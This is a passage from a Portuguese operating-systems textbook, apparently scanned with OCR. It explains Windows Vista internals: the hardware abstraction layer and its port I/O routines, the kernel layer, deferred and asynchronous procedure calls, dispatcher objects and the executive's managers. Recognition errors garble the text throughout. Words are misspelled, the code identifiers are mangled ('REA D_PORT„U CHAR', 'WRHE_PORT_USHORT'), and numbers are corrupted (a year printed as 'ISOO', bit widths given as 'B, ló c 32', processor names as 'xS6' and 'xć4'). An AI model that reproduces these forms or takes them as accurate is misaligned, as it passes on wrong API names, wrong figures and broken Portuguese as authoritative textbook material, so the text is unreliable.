A HAL nao fornece abstraęóes ou servięos para dispo- 
sitivos espedficos de E/S como teclados, mouses, discos ou 
para unidade de gerenciamento de memória. Esses recur- 
sos ficam espaihados nos componentes do modo nucleo e, 
sem a HAL, a ąuantidade dc código quc teria de ser uiodi- 
ficada semprc quc fosse fcito transportc do sistema opera- 
donal seria substandal, mesmo ąuando as rcais diferenęas 
de hardwares fossem pequenas, Transportar a própria HAL 
e simples porque todo o código que depende de maąuina e 
cojicentrado em um lugar e os objetivos do transportc sao 
bem definidos: implemeniar todos os servięos da HAL. Du- 
ranie muitos lanęamentos a Microsoft apoiou o Kit de De - 
senvolvhmnto da HAL , que possibilitava a os fabricantes criar 
sua própria HAL permitindo a outros componentes do nu- 
cleo trabalhar em novos sistemas sem modificaęao, desde 
quc as mudanęas dc hardware nao fossem muito grandes. 

Como um exemplo do que a camada de abstraęao de 
hardware faz, compare a E/S mapeada em memória com 
as portas de E/S. Algumas maquinas utilizam a primeira e 
outras maąuinas, a segunda. Como deve ser programado 
um drivcr: usando ou nao a E/S mapeada em memória? 
Em vez de foręnr uma opęao — o que aconteceria se fosse 
cncomrado um diiver naoportatil para uma maąuina —, a 
camada dc abstraęao dc hardware oferecc u es procedimcn- 
tos para os dcsenvolvedores dc drivcrs usarem na leitura 
dos registradores dos dispositWos. Oferece ainda outros tres 
procedimeaios para escrever ndes: 

uc = REA D_PORT„U CHAR (port); 

WRITE_PORT_UCHAR(port, uc); 

us = R E AD_ PORT^USHORT (port); 

WRHE_PORT_USHORT(port 1 us); 

ul = READ_PORT_ULONG<port); 

WRITE_PORT_LONG(port, ut); 

Esses proccdimentos leem e escrevem, para uma dada 
porta, inteiros sem sinal de B, ló c 32 bits, respcctivamen- 
te. A camada de abstraęao de hardware e que decide se a 
E/S mapeada em memória e necessaria. Desse modo, um 
driver pode ser transportado sem modificaęao entre ma- 
quinas, que dilerem na maneira como os registradores de 
dispositivos sao implementados. 
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Os drivers Ireąuentemente precisam ter acesso a dis- 
posilivos especifieos dc E/S por varia$ razóes* No mvd do 
hardware, u ni dispositivo tem um on mais endereęos eni 
um ceno barranientG* Como nos computadores motier- 
nos e comum haver muitos barrairiemos (ISA, PCI, PCLX, 
USB, 1394 etc), e possivel que mais de um dispositivo te- 
nha o mesmo endereęo cm barramcmos diferenieś; logo, e 
necessaria alguma forma de diferenaa-los. A HAL ofcrece 
um servięo para ideniifkar dispositiyos mapcando os en- 
dereęos dos dispositiyos de um dado barramemo em um 
endereęo togi co valido no a mb i to do sistema, Dessa rnand- 
ra r nao se exigc que os drwers saibam ąual d1spositivo esta 
cm qual barramento* Essc metanismo mnibćm protegc as 
camadas superiores das propriedades das esiruiitras e con- 
vcnęocs dc endereęamcnto de um ba na men to altemativo. 

As mtemipęóes lem u ni próbie ma semelhante: lambem 
sao dependentes do barramemo. Assim, a HALainda oferece 
servięos para Identificar as interrupęoes no ambito do siste- 
ma e servięos para permitir quc os drivcrs soja ni ligados as 
rotinas de semęos de interrupęao, tomando a interrupęao 
portatil, sem predsar saber qu&l vetor de interrupęoes es la 
destlnado a qual barramemo. O gerenciamemo do nfvel de 
requisięao de interrupęao tambem e tratado na HAL. 

Outro servięo da HALć configurar e gcrcnciar as trans- 
ferencias do DMA dc maneira independeme de dispositi- 
vo. Podem ser tratados tamo o DMA no ambito do sisiema 
quanto o DMA de plaeas de E/S esperificas. Os dispositiyos 
sao referenciados por seus endereęos lógicos. A HAL tam¬ 
bem implementa o software espalha/reune (escrita on lei- 
lura de blocos da memória fisi ca nao contfguos}. 

A HAL tambem gerencia os relógios e temporizadores 
de forma portatil. O tempo e monitorado em unidades de 
100 nanossegundos, comcęando em !" dc Janeiro dc 1601, 
quc e a primeira data dos ultimos quatro seculos, o que 
simplifica o i rat a mc oto dos a nos bissextos. (Teste rapido: 
ISOO foi um ano bisscxto? Rcsposta rapida: Nao.) Os scrvi- 
ęos de tempo dissociam os drivers das freąueneias reais em 
que os relógios sao executados. 

Os componemes do micie o algumas vezes precisam de 
sineronismo cm um nivcl muito baixo, cspecialmentc para 


impedir condięoesde corrida em sistemas muhiprocessado- 
res, A HAL fornece algumas primitivas para gerenciar essa 
sincronizaęao, como travaś de espera ocupada (spin-focks) f 
na qual unia CPU simplcsmente espera que um rccurso 
ocupado por outra CPU seja Ubcrado, particularmeme em 
situaęoes nas quais o recurso e retido, cm geral apenas por 
algumas instruęoes dc maąuina. 

Por lim, depois dc o sistema ter sido inidalizado, a 
HAL infonna o BIOS c inspeciona a memória CMOS dc 
configuraęao. se houver unia, para encomrar qtiais bana- 
men Los e dispositiyos dc E/S o sistema contem e como eles 
estao configurados, Essa informaęao c\ cnlao, colocada no 
registro para que outros componentes do sistema possani 
verifica4o, sem ter de entender como funciona o BIOS ou 
a memória de configuraęao* Um resumo de algumas das 
atribuięoes da HAL c dado na Figura 11.5. 

A camada do nucleo 

Aciina da ca mada de abstraęao de hardware esia o 
NTOS, que consiste de duas camadas: o nucleo e o exe- 
cutlvo. "Nucleo v e um termo confuso no Windows, pois 
pode se referir a todo o código execuiado no modo nucleo 
do processador; pode tambem fazer referenda ao arquivo 
ntoskrnl.exe quc contem o NTOS, o cc me do sistema ope¬ 
ra ciona! Windows; ou pode se referir a camada do nucleo 
dentro do NTOS, que e como o usamos nesta seęao. Ele 
pode are ser usado para nomear a biblioteca do Wm32 do 
modo usuario que prove os invólucros para as chamadas de 
sistema nativas: a kemel32Mli 

No sistema operacional Windows a camada do mi de o, 
ilustrada acima da camada execudva na Figura 11.4, ofe¬ 
rece um conjunto de abstraęoes para o gerenciamemo da 
CPU, As abstraęoes principais sao os threads, mas o nucleo 
tambem implementa Lratamento dc exceęoes, armadilhas 
e muitos outros tipos de interrupęoes. A criaęao c destrui- 
ęno das esimturas de dados que dao supone a utilizaęao de 
threads sao implementadas na camada executiva. A cama¬ 
da do nucleo e responsavel por agendar e sineronizar os 
threads* Ter o su porte aos threads cm u ma camada sepa- 
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I Figura 11,5 Algumas das funęóes de hardware que a HAL gerencia. 
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rada permite a ca mada executiva ser implementacja u liii- 
zando o mesmo modelo multithreading preemptivo usado 
para escrever códigos concorrentes no modo usuario; eon- 
tudo, os recursos primitivos de sincronizaęao no executivo 
sao muito inais cspccializados. 

O escalonądor de threads do nucleo e rcsponsavel. por 
determinar qua1 thread esta sendo execuiado em cada CPU 
do sistema. Cada thread e executado ate que uma inter- 
rupęao do lipo temporizador sinalize que e o momento de 
trocar para outro (o ąuantum expirou) on ate que precise 
esperar por algo, como a condusao de uma opera ęa o dc E/S 
on a liberaęao de urn bloqucio, on quando um thread dc 
prioridade alta sc torna cxccutavcl e prccisa da CPU. No 
chaveamcmo dc rnn thread para outro, o cscalonador 6 
cxeculado na CPU c assegura que os registradores e outros 
estados de hardware lenham skio gravado$. Ele en tao sde- 
ciona outro thread para ser exectuado na CPU e restaura o 
estado gravado na ultima vezque esse thread foi exeeutado. 

Sc o próximo thread a ser cxcattado esta em um espa- 
ęo dc cndereęamcnto diferente (por cxcmplo, um proccsso) 
do thread que esta sendo substitmdo, o cscalonador ta ra¬ 
bem deve mu dar os espaęos de cndereęamcnto. Os dctalhes 
do algoritmo de agendamenioserao discutidos mais adiante 
nesie capitulo, ąiiando ehegarmos aos processos e threads. 

Alem dc ofcreccr uma abstraęao de alto mvd do hard¬ 
ware e trata r as trocas dc threads, a ca mada do nucleo tam- 
bem tern outra funęao prindpal; proporcionar suportc de 
baixo mvei para duas dasses de mecanismos de sineroniza- 
ęao: objetos de comrole e objetos despachantes. Os objetos 
de controle sao as esiruiuras de dados que a ca mada do 
nucleo fornece como abstraęóes a camada execuiiva para o 
gerenciamento da CPU. Eles sao alocados pelo exeeutivo, 
mas manipulados com rotinas forneddas pela camada do 
nucleo. Os objetos despachantes sao a classe de objetos 
habituais do executivo que usam uma estnilura de dados co- 
mum para sincronizaęao. 

Chamadas de procedimento diferidas 

Os objetos de comrole incluem objetos primitivos para 
threads, intermpęóes, icmporizadores, sincronizaęao, per- 
lis e dois objetos especiais para a implementaęao de DPCs 
e APCs. Os objetos de DPC (chamada de procedimento 
diferida — deferred procedurę mil) sao u sad os para reduzir o 
tempo gasto na execuęao das ISRs (rotinas de servięo de 
interrupęao — inkrrupt sewice routines) em resposta a uma 
interrupęao de um determinado dispositivo, 

O hardware do sistema atribui um mvel de prioridade 
de hardware as interrupębes. A CPU tambem associa um 
mvd dc prioridade ao que cstiycr cxccutando, c apenas 
responde as interrupędes quc estivercm em um mVd de 
prioridade maior do quc o quc esta sendo usado por cla no 
momento. Os mveis normais dc prioridade, incluindo os dc 
tu do que e feito do modo usuario, sao 0. As interrupęoes 
de dispositivos acontecem em prioridade 3 ou mais alta, e 
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a ISR para uma interrupęao de disposiiivo e, de maneira 
usual, executada no mesmo mVei de prioridade da inter¬ 
rupęao, com o objetiTO de evitar a ocorrencia de outras 
interrupęoes menos imponantes durante o processamento 
de uma mais import antę, 

Se uma ISR e executada por muito tempo, a matm- 
tenęao de interrupęoes de baixa prioridade sera at rasa da, 
talvez causando perda de dados ou retardando a vazao de 
E/S do sistema. Muitas ISRs podem estar em andamento a 
qualqtier momento, com cada ISR sucessiva sujelta a inter- 
rupęoes de nweis mais alt os dc prioridade. 

Para reduzir o tempo gasto processando as ISRs, ape- 
nas as operaęóes criticas sao executadas, como capturar o 
resullado de urna operaęao de E/S e reimeializar o disposb 
tivo. O processamento adicional da interrupęao e diferido 
ate que o ntvel de prioridade da CPU tenha babtado e nao 
esleja mais bloqueaiido a ma nu tenęao de outras interrup- 
ęoes, O objęto de DPC e usado para representar o trabalho 
adicional a ser feito e a ISR convoca a camada do nucleo a 
cnfildrar a DPC na lista dc DPCs dc um determinado pro- 
cessador; sc a DPC ć a primetra da lista, o nucleo registra 
uma solicitaęao especial no hardware para interromper a 
CPU em prioridade 2 (q ue o NT chama de mvel DES PA¬ 
CH ANTĘg Quando a ultima de quaisquer ISRs em execu- 
ęao lor condufda, o mvel de interrupęao do processador 
voliara para baixo de 2, desb!oqueando a interrupęao para 
o processamento de DPCs. A ISR para interrupęao de DPC 
processara cada uma das DPCs que o mideo enfileirou. 

A tecnica de usar interrupęoes de software para diferir 
o processamento de interrupęoes e um metodo bem esia- 
beleddo de reduęao da latenda da ISR. O UNTX e oulros 
sistemas comeęaram a usar o processamento diferido nos 
anos 1970 para lidar com o hardware lento e as limitaęóes 
de buffer em conexóes seiiais aos term inais. A ISR bus- 
caria os caracteres do hardware e os poda cm fila, Dcpois 
que todo o processamento de imerrupęóes de baixo mvel 
fosse concluido, uma interrupęao dc software exccutaria 
uma ISR dc baixa prioridade para fazer o processamento 
de caracteres, como implementar a exdusao dc caracteres 
a esąuerda do cursor por meio do cnvio dc caracteres de 
comrole ao terminal para apagar o ultimo caractere exibido 
e mover o cursor uma posięao para tras. 

Um exemplo similar no Windows ho je c o dispositivo 
de teclado. Dcpois que uma lecla e pressionada, a ISR de 
tedado le o código da tecla de um registrador e entao reati- 
va a interrupęao do tedado, mas nao realiza processamento 
adicional da tecla naqude momento. Ao contrario, ela usa 
uma DPC para colocar em fila o processamento do código 
da lecla ale que todas as interrupęoes de dispositivos mais 
imponantes ten bani sido processadas. 

Como as DPCs sao executadas cm nivd 2, elas nao 
impedem a execuęao das ISRs de dispositivo, mas cvitam 
a execuęao de qualquer thread ate que todas as DPCs da 
fila terminem e o nfvd de prioridade da CPU seja t razi do 
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para baixo de 2. Os drivers de dispositivos e o próprio siste- 
ma devem toniar cuidada para nao executar lSRs ou DPCs 
por muito tempo, pois, como nao c permitido aos threads 
executar, elas podcm fazer o sistema parecer vagaroso e 
produzir erros na cxccuęao dc musi ca s, foręando a parada 
dos threads que estivcrcm gravando a musica no bu Mer do 
dispoS!tivo dc soin. Outro uso comum dc DPCs e executar 
rotinas cni resposta a urna interrupęao dc temporizador. 
Para evitar o bloąueio de threads, eventos temporiza- 
dores qtie preclsem executar por urn tempo estendido de- 
vem enfileirar as soiicitaęoes para o lanąue de threads 
operarios que o nikleo manieni para aiividades de segundo 
piano; esses threads tem priondades de agendamemo 12, 
13 e 15. Como veremos na seęao sobre agendamemo de 
threads, essas prioridades significam que os itens de traba- 
Jho serao executados na freme da maioria dos threads, mas 
nao vao interferir na cxecuęao dos threads dc tempo reaL 

Chamada de procedimento assmerona 

O outro objęto de comrole espedal do nudeo e o obję¬ 
to de APC (chamada de procedimento assmerona — asyn- 
chroumm procedurę cali). As APCs sao similares asDPCs no 
diferir do processamento de uma rótina de sistema, mas, 
ao contrario das DPCs, que operam no contexto de CPUs 
espedficas, as APCs operam no contexto dc um thread cs- 
pecffico, No processamento dc uma tecla pressionada, nao 
imperia cm qual contcxto a DPC c exccutada, porąue uma 
DPC nao passa de mais uma parte do processamento de 
interrupęoes e elas só tern dc gerendar o dispositivo ffsico 
e realizar operaęoes que nao dependam de threads, como 
gravar os dados em um buffer no espaęo do nudeo. 

A rotina dc DPC e executada no contexto dc qualquer 
thread quc cstava sen do execu tado quando a interrupęao 
odginał acontcceiL Ela eonvoca o sistema dc E/S para re- 
portar que a operaęao de E/S foi completada e o sistema de 
E/S poe uma APC em espera para ser executada no contex- 
lo do thread, que fez a solidtaęao original de E/S, onde ela 
pode acessar o espaęo de endereęamento do modo usuario 
do thread que vai processar a entrada. 

Quando lhe e eon ve nieme, a ca ma da do nikleo en- 
irega a APC para o thread c o agenda para execuęao. Uma 
APC e projetada para se parecer com uma chamada de pro- 
cedimemo inesperada, dc algum modo similar aos trata- 
dores dc sinais no UNIX, A APC do modo nikleo para a 
conclusao da E/S e executada no comexio do thread que 
inicializou a E/S, mas no modo nudeo, Isso da a APC aces- 
so tanin ao buffer do modo nu cle o como a todo o espaęo 
de endereęamemo do modo usuario pertenceme ao pro- 
cesso qne contem o thread. Qucmdo uma APC e entregue, 
depende do que o thread ja esteja fazendo e ate de que tipo 
de sistema. Em um sistema multiprocessador, o thread que 
rccebc a APC precisa i ni car su a execuęao antes mesmo que a 
DPC seja conclutda, 

As APCs do modo usuario tambem podem ser usa- 
das para notihcar a conclusao da E/S no modo usuario ao 


thread que inicializou a operaęao de E/S. Elas invocam um 
procedimento do modo usuario, designado pela aplkaęao, 
mas apenas quando o thread-alvo e bloqueado no niideo 
e marca do como dispomvel para aceitar APCs, O niideo in- 
terrompe □ espera do thread e retorna ao modo usuario, 
porem com os registradores e a pil ha modifieados para exe^ 
cutar a rotina dedespacho da APC na bibliotece de sistema 
ntdll.dll. Essa rotina im oca a rotina do modo usuario quc a 
aplicaęao associou a operaęao de E/S. Alem de especificar 
as APCs do modo usuario como urn meio de execuęao de 
código quando as operaęoes de E/S terminam, a A PT do 
Win 32 GueueUserAPC perm ile usar as APCs para propósiios 
arbitrarios. 

A ca ma da executiva tambem usa APCs para outras 
operaęoes alem das de conclusao de E/S, Como o mecanis- 
mo da APC e projetado de forma cuidadosa para entregar 
as APCs apenas quando for seguro fazę do, de pode ser usn¬ 
ęło para por firn aos threads de forma segura. Se nao for um 
bom momemo para fi na li za r um thread, cle tera dęcia rado 
su a entrada em uma regiao critiea e ira adiar as emregas de 
APCs ate que saia dessa regiao. Os threads do niideo se de- 
claram como entrando em regioes cnticas para adiar APCs 
antes de conseguirem travas ou outros recursos, de modo 
que nao possani ser terminados enquanto ainda estiverem 
de posse do recurso. 

Objetos despachantes 

Outro tipo de objęto de sincronizaęao e o objęto 
despachante. Estc e quaiquer um dos objetos habitu ais 
do modo nudeo (aquele lipo ao qual os usuarios podem 
fazer referenda com manipu la dores) que contenha uma 
estru tura de dados chamada d i s pa tcher_header, exibida 
na figura 11.6. 

Isso inclui semaforos, mutexes, cvcntos, temporiza- 
dores waitahk e outros objetos pclos quats os threads po¬ 
dem esperar para sincronizaęao com outros threads, Eles 
tambem incluem objetos representando arquivos abertos, 
processos, threads e porias de IRC. A estrutura de dados 
despachanie contem um sinalizador ifia$) representando o 
estado sinalizado do objęto e uma fila de threads aguardan- 
do pelo objęto ser sinalizado. 

Recursos primitivos de sincronizaęao, como semaforos, 
sao objetos despachantes naturais. Os temporizadores, ar- 
qulvos f por Las, threads e processos tambem usam os meca- 
nismos de objęto despachante para notificaęoes. Quando 
um temporizador c disparado, a operaęao de E/S 6 filializa- 
da em um arquivo, dados ficam disponivcis cm uma porta, 
ou um thread ou processo e termin a do, o objęto despa¬ 
chante associado e sinalizado, acordando todos os threads 
que aguardavam por esse evemo. 

Vislo que o Windows usa um unico mecanismo uni- 
ficado de sincronizaęao com os objetos do modo niideo, 
APIs especializadas, como a wait3 para aguardar por proces¬ 
sos filhos no UNIX, nao sao necessarias para aguardar por 
eventos. De maneira frequeme os threads querem esperar 





Sll#MfG66 


Ca pitni o Tl E stu d o de caso _2: Wi n d ows Vista 519 


r 


Objęto 
execullvo -s 




Cabegalho do objęto 


Sina li zador de rtotifjcaęao/sincrortizaęao 


Estado sinalizado 


Topo da lista para threads em espera 


Dados especificos de objęto 


DISPATCHER HEADER 


Figura 11.6 Estrutura de dados dispatcher_header embutida em muitos objetos executivos {objetos despachantes). 


por multiplosevcntos ao mesmotempo. NoUNIX, um pro- 
cesso pode esperar para que dados estejam dispomveis cm 
qualqucr u m dos 64 soąuetcs de rcde usando a cha mada 
de sisicma seiect. No Windows ha u ma A PI similar, Wai t- 
ForMultipteObjects, mas eto per mi te quc um thread 
espcre por qualqucr objęto despachanie para o qual ele 
tenha um descritor. Ale 64 descritores podem ser especi- 
fkados para a WaitForMultipteObj&cts, hem como um valor 
opdona] que cspecilica o tempo para seu lermino. O thread 
se torna promo para cxecutar ąuando qualqiier um dos 
cventos assodados aos descritores ć sinalizado on ąuando 
o tempo para o Lermino expira. 

Na verdade, ha dois procedimentos difcrentes que o 
nucleo usa para fazcr os threads esperarem por um objęto 
despachanie executavel. Sinalizar um objęto de notifi- 
caęao lornara excculavcis todos os threads em espcra. Ja 
os objetos de sincronizaęao a pen as lornam o primeiro 
thread cm espera execuiavel e sao u sad os para objetos 
despachantes que implemcniam recursos prirniuvos dc 
bloąueio, como muiexcs. Quando um thread em espera 
por um bloqueio volia a execuęao, a primeira coisa que 
faz e tentar recuperar o bJoqueio novamenie. Se apenas 
um thread de ca da vez pode reter o bloąucio, todos os ou- 
tros ihreads que sc Lornararn prontos para execuęao podem 
bloquear iniediatameriLe, implicando muitos chaveamen- 
tos de contexto dcsnecessarios. A diferenęa entre objetos 
despachantes usando sincronizaęao e notiiicaęao e um si- 
nalizador na estrutura dispatcher_header. 

Como um comcntario a parte, os mutexes no Windows 
sao chamados de 'mmames' no código porąue eles [oram 
neccssarios para implementar a scma ntica do OS/2 de na o 
perrnitir que eles próprios se desbloąueassem ąuando um 
thread usando um deles safsse, algo que Cutler conside- 
rou bizarro. 

A camada executtva 

Como exibido na Figura 1 L4, abaixo da camada do 
mielec do NTOS esta o executivo. A camada executiva 
e escrita em C, em sua maioria independe de arąuitetura 
(sendo o gerenclador de memória unia notavel exceęao) c 
tern sido transportada a novos processadorcs com esforęo 
apenas modesto {MIPS, xS6, PowerPC, Alpha, i A64 e xć4). 
O executivo contem urna serie dc componcntes difcrentes 
e todos funcionam usando as ahstraęoes de controle fome- 
cidas pda camada do niicleo. 


Gada componente e dividido em interfaces e estru tu ras 
de dados iruernas e extemas. Os aspeetos intern os de cada 
componente sao ocultos e utilizados apenas dentro do pro- 
prio componente, ao passo que os aspeetos externos estao 
dlsponfms para todos os outros componcntes do executi- 
vo. Um subconjunto dc interfaces extcrnas e exportado do 
executaveJ ntoskrnl.exe e os drivcrs de dispositivos podem 
se figar a das como se o execulivo fosse uma biblioteca, A 
Microsoft chama muitos dos componcntes do exccmivo de 
'gercnciadores', porąue cada um e responsavd pda gestao 
de alguns aspeetos dos servięos opera don ais, como E/S, 
memória, processos, objetos etc. 

Como na maioria dos sistemas operacionais, muitas 
das fundonaiidades do executłvo do Windows sao como 
códigos da biblioteca, cxccto que das sao cxccutadas cm 
modo nucleo para que suas estruturas de dados sejam com- 
partilhadas e protegidas doacesso de código do modo usua- 
rio e para que elas possani aeessar es La dos de hardware 
prmlegiados, como os regisiradores de controle MMU. De 
outra forma, entretanto, o executivo esta apenas exccutan- 
do funęóes em nome de quem as esia invocando e, desse 
modo, e executado no thread de quem esta irwocando. 

Quando qualquer uma das funęócs do executivo blo- 
ąiieia aguardando para sincronizar com outros llncads, o 
thread do modo u sua rio ć bloąueado tambem. Isso faz sen- 
lido quando se esia trabathando em nome de um thread 
espectfico do modo usną rio, mas pode ser injusto ąuando 
se execuia um irabalho relackmado a la rei as doniesiicas 
comuns. Para eviiar o seąuestro do thread correme ąuan¬ 
do o cxccutivo determina quc alguma tarefa domestica e 
necessaria, uma serie de threads do modo nucleo e criada 
ąuando o sistema inicializa e dedicada a tarefas espeeffi’ 
cas, como se assegurar de que paginas moclificadas sejam 
escritas no disco. 

Para as larefas previsiveis f de baixa frequenda, ha um 
iliread que e executado uma vez por segtmdo e tern uma 
lisia de tareias com os Itens que deve iraiar. Para os traba- 
llios menos previsfveis, ha um tanąuc de threads operarios 
dc aha prioridadc, mencionado anieriormcmc, quc pode 
ser usado para executar tarefas deiimitadas colocando em 
fila uma solicitaęao e sinalizando o evento de sincronizaęao 
pelo quai o thread esta esperando. 

O gerenciador de objetos gerencia a maior parte dos 
objetos imeressanies do modo riucleo usados na camada 
exeauiva. Jsso indu i processos, threads, arquivos, semafo- 
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ros, dispositiyos de E/S e dńvers, temporizadores e muitos 
oulros* Como deseń to ames, os objetos do modo nudeo 
sao, na verdade, estru tu ras de dados aloeadas e usadas pelo 
nudeo, No Windows, estruturas dc dados do nudeo tem 
tanio cm comum que c mu i to u t i 1 gerendar vańas ddas cm 
lim recurso unificado. 

Os recursos oferecidos pelo gerenciador de objetos in- 
cluem gerendar a alocaęao e liberaęao dememória para ob¬ 
jetos, coniabUizaęao dc cota, dar suporte dc acesso a obje¬ 
tos usando manipuladores, manier contagem de referenda 
para refcrćndas de pontciros do modo nucleo, assim como 
refcrencias dc manipuladores, dar nomes aos objetos no es- 
paęó de nomes do NT e fornccer urn mecanismo exlensfvel 
para gerendar o ddodc vida de cada objęto. As cśiruiuras de 
dados do nudeo que precisam de algum desses recursos sao 
gerendadas pelo gerenciador de objetos. Ja ontras estrutu¬ 
ras, como os objetos de controle usados pela ca mada do nu¬ 
tko, ou objetos que sao apenas exiensóes dc objetos do mo¬ 
do nudeo, nlo sao gerendadas por ele* 

Cada objęto do gerenciador de objetos tern urn lipo 
usado para especificar como o ciclo de vida dos objetos 
daquele tipo deve ser gerenciado* Estes nao sao tipos no 
semido dc onentaęao a objetos, mas sao apenas u ma cole- 
ęao de parimetros espcdficados quando o tipo dc objęto e 
triado* Para criar um novo tipo, urn componcntc do exc- 
cutivo apenas chama urna A PI do gerenciador de objetos 
para fare-lo* Os objetos sao tao importanies para o funrio- 
namenlo do Windows quc o gerenciador de objetos sera 
discutido em mais detalhes na próxima seęao. 

O gerenciador de E/5 fomccc a estru tura para im- 
plementar os drivers de dispositivos dc E/S c tambćm urna 
serie de servięos executivos espedfkos para configurar, 
accssar c realizar općraęocs nos dispositivós. No Windows, 
os dńvers de dispositiyos podem apenas gerenciar dispo- 
sitivos ffsicos, mas eles tambem fornecem extensibilidade 
ao sistema operacional. Muitas funęÓes compiladas para o 
nudeo em out ros sistemas sao carregadas de forma dinami- 
ca c ligadas pelo nudeo no Windows, ineluindo plLbas dc 
protocolos de redes e sistemas dc arqiuvos, 

Versoes recentes do Windows tem muito mais suporte 
para a execuęao de dnvers de dispositiyos no modo usua^ 
rio, c esse e o modelo preferido para novos drivers de dispo¬ 
sitiyos. Ha cenienas de milhares de dnvcrs de disposiiivos 
diferentes para o Windows Vista, fundonando com mais de 
um milhao dc dispositiyos distintos, Isso represema muito 
código para accrtar. E muito me!hor quc os erros deixcm 
os dispositiyos inacessiyeis por mcio de um travamemo no 
modo usuario do que foręar o sistema a entrar em modo 
de checageni de erro (biujcheck). Os erros nos driyers de 
dispositiyos do modo nudeo sao a maior causa da temvel 
BSOD (tela azul da morte — bluescreeri ofdeath) em que 
o Windows detccta um erro faial no modo nudeo e desliga 
ou rrinicializa o sistema. As BSODs sao comparaveis aos 
panicos do nucleo nos sistemas UNIK* 


Em essencia, a Microsoft reconhece agora o que os 
pesquisadores do campo de micronucleos como o MIN1X 3 
c L4 sabem ha a nos: quanto mais código houver no nucleo, 
mais erros. Como os drivers de dispositiyos compreendem 
cerca de 70 por cento do código no nucleo, quanto mais 
driyers puderem ser movidos para processos do modo usu¬ 
ario, onde um erro causa apenas a fal ha de um unico dri- 
ver (em vez de trazer abaixo todo o sistema), melb on Ć 
esperado que a tendencia em mover código do nucleo para 
processos modo usuario cresęa nos próximos anos. 

O gerenciador dc E/S tambćm inclui o gerenciamcnto 
dc recursos pronto para usar c dc energia. O plug-and-play 
entra em aęao ąuando novos dispositiyos sao detcctados 
no sistema, O subcomponente plug-and-play e notificado 
primciramente; cle traballia com urn scrvięo, o gerenda- 
dor de recursos pronto para usar do modo usuario, para 
encomrar o driver de disposilivo apropriado e carrcga-lo 
para o sistema, Encomrar o driver de di$positivo certo 
nem sempre e facil e, algumas vezes, depende de urna 
correspondencia sofisticada da vcrsao do dispositivo de 
hardware com urna versao particular dos drivcrs t Em aJ- 
guns casos, um unico dispositivo da suporte a u ma imer- 
face-padrao que e suportada por varios drivers diferentes, 
cscritos por empresas diferentes* 

O gerendamenio de energia reduz o consumo de 
energia ąuando posswel, estendendo a vida util das bate- 
rias em notebooks e economizando energia em deskiops e 
servidores. Acertar no gerenciamcnto de energia pode ser 
desa H ad or, urna vez que lia muiias dependencias su Lis eiv 
tre dispositiyos e os barramemos que o$ conectam a CPU 
e a memória. O consumo de energia nao e afetado apenas 
por quais dispositiyos estejam ligados, mas tambem pela 
frequencia de relógio da CPU, que tambem e eontrolada 
pelo gerenciador de energia. 

Esludaremos sobre E/S dc forma mais profunda na Se- 
ęao 11.7 e sobre o mais importante sistema de arquivos, o 
NTFS, na Seęao 11.8* 

O gerenciador de processos gerencia n criaęao e li- 
nalizaęao dc processos c threads, ineluindo cstabclccer as 
politicas c parametros que os governam. Todavla, os aspcc- 
tos operacionats dos threads sao determinados pela ca mada 
do nucleo, que comrola o agendamemo e a sincronizaęao 
dos threads, assim como sua interaęao com os objetos de 
controle, como APCs. Os processos eon tem threads, um es- 
paęo de endereęamento e urna tabela de deseńtores com 
os descńtores que o processo pode usar para se referir aos 
objetos do modo nucleo* Os processos tambćm indu cm 
informaęócs ncccssarias ao escalonadoi para a comutaęao 
entre espaęos dc endereęamento c o gerenciamcnto dc in- 
formaęóes dc hardware cspecfficas para processos (como 
descriiores dc seginemo). Esludaremos o gerendamenio 
de processos e threads na Seęao 11.4. 

O gerenciador de memória do executivo implemen- 
ta a arąuitetura dc memória yirtuai paginada por dcman- 
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da. Ele gerencia o mapeamemo de paginas virtuais para os 
ąuadros de paginas ffsicas, o gerenciamento dos quadros 
ffsicas disponweis e o gerencianiemo do arquivo de pagi- 
naęao no disco usado para fazer instandas privadas de pa- 
ginas virtuais quc nao estao mais carrcgadas na mcmória. 
O gerendador dc mcmória tambcm fornccc rccursos espe- 
ciais para aplicaęoes dc grandcs semdores como bancos dc 
da dos c componentes dc tempo dc execuęao dc linguagens 
dc program a ęa o como os colctores dc Uxo. Estudaremos 
o gerenciamento de mcmória mais adiante nesie capftulo, 
na Seęao J 1.5. 

O gerendador de cache apcrfcięoa o desempenho 
dc E/S para o sistcma dc arquivos por mcio da manutcnęao dc 
urna cache das paginas do sistcma dc arquivos no espaęo dc 
cndcreęamento virtual do nocko. Ele ubliża om caching 
com cndercęamenio virtual, ou seja, organizar paginas na 
cache em termos de sua localizaęao cm sens arquivos. Isso 
difere do caching de blocos ffsicos como no UNIX r em que 
o sistema manieni uma cache dos blocos endereęados fisi- 
camente do volume bruto do disco. 

O gerenciamento de cache ć implementado usando 
itiapeamento de mcmória dos arquivos. O cashing vcrda- 
ddro e realizado pelo gerendador de memória. O gerencia - 
dor de cache precisa apenas se preocupar em deddir quais 
partes de quais arquivos pór em cache, assegurando que 
dados armazenados em cache sejam descarregados no disco 
em tempo habil e gerenciando os endereęos virtuais do mi- 
cleo usados para mapear as paginas de arquivos na cache. 
Se uma pagina nccessaria para a E/S para um arquivo nao 
esta disponfvd na cache, a pagina falhara em usar o gcrcn¬ 
ciador de mcmória, Estudaremos o gcrcnciador dc cachc 
na Seęao 1 l.ć. 

O monitor de referenda de seguranęa impoe a os 
elaborados mecanismos de seguranęa do Windows, que 
su porta m os padroes internacionais de seguranęa para 
computadorcs, diamados de criterios comuns, uma evo- 
luęno dos reąuisitos dc seguranęa do Iivro Laranja do Dc- 
partamenfo de Delesa dos Estados U ni dos. Esscs padroes 
espccificam um vasto mimero de regras que um sistcma 
em conforrrddade deve seguir, como autemicaęao de usua- 
rios, auditoria, esvaziamemo da memória alocada, e niuito 
mais. Unia das regras requer que toda a verlfica ęao de aces- 
sos seja implementada por um linico módulo no sistcma. 
Mo Windows, esse módulo e o monitor de referencja de 
seguranęa, no mieleń. Iremos estudar mais detalhes do sis- 
tema de seguranęa na Seęao 11.9. 

O executivo eon tein uma serie de omros componen¬ 
tes que descreveremos de forma breve + O gerendador de 
configuraęao e o componente do executivo que imple- 
menta o registro, como descrito antes. O regisiro coniem 
dados de cotifiguraęao para o sistema em arquivos de siste- 
mas de arquivos chamados colmeias. A colmeia mais critica 
e a SYSTEM, que e carregada na memória no ato da iniciali- 
zaęao. Só depois que a ca mada executiva ten ha inidalizado 
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coni sucesso seus componentes-chave, Lncluindo os drivers 
de E/S que falam com o disco do sistema, e que a cópia em 
memória da colmeia e reassociada com a cópia no sistema 
de arquivos. Dessa forma, se algo ruim acontecer durante 
